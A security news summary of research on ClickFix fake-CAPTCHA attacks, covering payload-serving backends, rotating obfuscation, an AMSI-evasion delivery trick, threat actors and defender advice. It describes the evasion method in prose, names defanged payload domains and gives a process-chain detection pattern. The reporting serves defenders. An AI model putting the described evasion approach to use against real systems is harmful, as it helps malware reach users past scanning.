Security researcher Bert-Jan Pals analyzed roughly 3,000 live ClickFix payloads and presented findings at OrangeCon in early June, publishing details on June 30. ClickFix is a social engineering technique where fake CAPTCHA or error pages trick users into copying and running malicious commands manually, bypassing traditional antivirus and endpoint controls.
Pals discovered that ClickFix payloads are now produced by API-driven backend servers that act as on-demand services. These servers check access tokens, log callers, and return freshly scrambled commands each time. One server returned 100 different payloads wrapped in rotating obfuscation methods including Base64, AES, TripleDES, Rijndael, and Deflate. The platform serves lures in 25 languages and matches commands to the visitor’s operating system, including macOS and Windows.
The research also revealed a new delivery method designed to evade Windows’ Anti-Malware Scan Interface (AMSI). Instead of copying a malicious command directly, the newer pages copy a harmless-looking orchestrator line that moves a downloaded file from the Downloads folder, unpacks it, and runs the script inside. This technique helps the malicious code slide past AMSI scanning.
ClickFix has been adopted by state-backed groups including APT28, MuddyWater, and Kimsuky, and has spawned variants like FileFix and DownloadFix. ESET measured a 517% increase in ClickFix usage from late 2024 into early 2025, and Microsoft’s 2025 Digital Defense Report attributed 47% of initial-access cases to ClickFix. The technique has its own MITRE ATT&CK entry, T1204.004.
Defenders are advised to monitor process chains such as explorer.exe or WindowsTerminal.exe launching powershell.exe, cmd.exe, or msiexec.exe with network connections. Behavioral EDR, application-control rules, and user guidance remain key defenses. Pals listed three payload servers: comicstar[.]lat, babybon[.]cfd, and merkantalolol[.]asia.
CVEs: CVE-2026-20245
Attack groups: APT28, MuddyWater, Kimsuky
Malware: ClickFix, ClearFake, FileFix, DownloadFix
Companies: ESET, Microsoft, Proofpoint, Expel
Products: Windows Defender, AMSI
Events: OrangeCon
Original source: thehackernews.com